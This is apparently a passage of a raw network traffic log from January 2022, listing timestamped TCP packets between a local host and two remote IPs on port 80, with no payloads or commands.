Jan 14, 2022 00:16:15.764070988 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764086008 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764126062 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764158964 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764163971 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764204025 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764211893 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764240980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764280081 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764286995 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764318943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764358044 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764370918 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764398098 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764435053 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764442921 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764473915 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764513969 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764527082 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764553070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764591932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764630079 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764651060 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764672995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764692068 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764712095 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764749050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764765978 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.764787912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764838934 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.765331984 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765371084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765408993 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765423059 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.765446901 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765484095 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765501976 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.765535116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765573025 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765579939 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.765613079 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765656948 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.765711069 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765752077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765789032 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765819073 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.765826941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765897989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765899897 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.765935898 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.765975952 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766009092 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766016006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766055107 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766074896 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766097069 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766134977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766163111 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766172886 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766211987 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766237974 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766249895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766289949 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766320944 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766329050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766366005 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766379118 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766405106 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766443014 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766459942 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766480923 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766520977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766530991 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.766561031 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.766611099 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.768910885 CET	49924	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.769382000 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769427061 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769464016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769498110 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.769504070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769543886 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769558907 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.769582033 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769620895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769638062 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.769664049 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769701958 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769740105 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.769742966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769782066 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769820929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769824028 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.769886971 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.769891977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769933939 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769970894 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.769989014 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770011902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770050049 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770062923 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770088911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770128965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770143032 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770165920 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770205975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770241022 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770242929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770281076 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770294905 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770320892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770359039 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770389080 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770411968 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770452976 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770466089 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770490885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770528078 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770536900 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770566940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770605087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770612001 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770644903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770684004 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770694017 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770721912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770761013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770770073 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770801067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770837069 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770852089 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770874977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770925999 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770931005 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.770944118 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.770983934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771006107 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771020889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771059990 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771080971 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771099091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771136999 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771152020 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771178007 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771214008 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771229029 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771253109 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771291971 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771307945 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771330118 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771368980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771383047 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771409035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771447897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771476030 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771486998 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771523952 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771537066 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771563053 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771600962 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771641970 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.771648884 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.771702051 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.829651117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.829689980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.829750061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.829857111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.829962015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830065012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830164909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830272913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830368996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830460072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830560923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830650091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830739021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830833912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.830930948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831021070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831110954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831209898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831296921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831391096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831482887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831582069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831671000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831765890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831856966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.831948042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832036972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832129955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832226038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832324028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832417965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832510948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832601070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832724094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832823038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.832928896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833025932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833122969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833224058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833323002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833422899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833518982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833623886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833725929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.833846092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834000111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834089041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834172964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834269047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834347010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834431887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834517002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834598064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834692955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834773064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834867001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.834949970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835032940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835119009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835201979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835287094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835369110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835449934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835536003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835618973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835702896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835802078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835881948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.835964918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.836045980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.836131096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.836214066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.836296082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.838629961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.838726044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.838882923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.838989019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839078903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839155912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839236975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839320898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839404106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839488029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839569092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839651108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.839920998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.840010881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.840038061 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840081930 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840117931 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840131998 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840154886 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840188980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840204000 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840226889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840262890 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840270042 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840300083 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840336084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840348959 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840373039 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840408087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840426922 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840442896 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840477943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840492010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.840498924 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840513945 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840548992 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840560913 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840584040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840619087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840634108 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840656042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840693951 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840707064 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840728998 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840761900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840775967 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.840796947 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.840847015 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.841034889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.841036081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841073036 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.841106892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.841120005 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.841145039 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.841181993 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.841187954 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.841214895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.841258049 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.841324091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841423035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841516018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841603994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841696024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841787100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841888905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.841978073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842073917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842186928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842222929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842261076 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842295885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842317104 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842329025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842330933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842366934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842375994 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842402935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842417955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842437983 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842467070 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842474937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842511892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842520952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842546940 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842547894 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842581034 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842597008 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842611074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842628002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842664957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842680931 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842698097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842719078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842732906 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842746019 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842770100 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842803955 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842809916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.842833996 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842839956 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842875957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842901945 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842911005 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.842947960 CET	80	49920	141.8.194.74	192.168.2.4
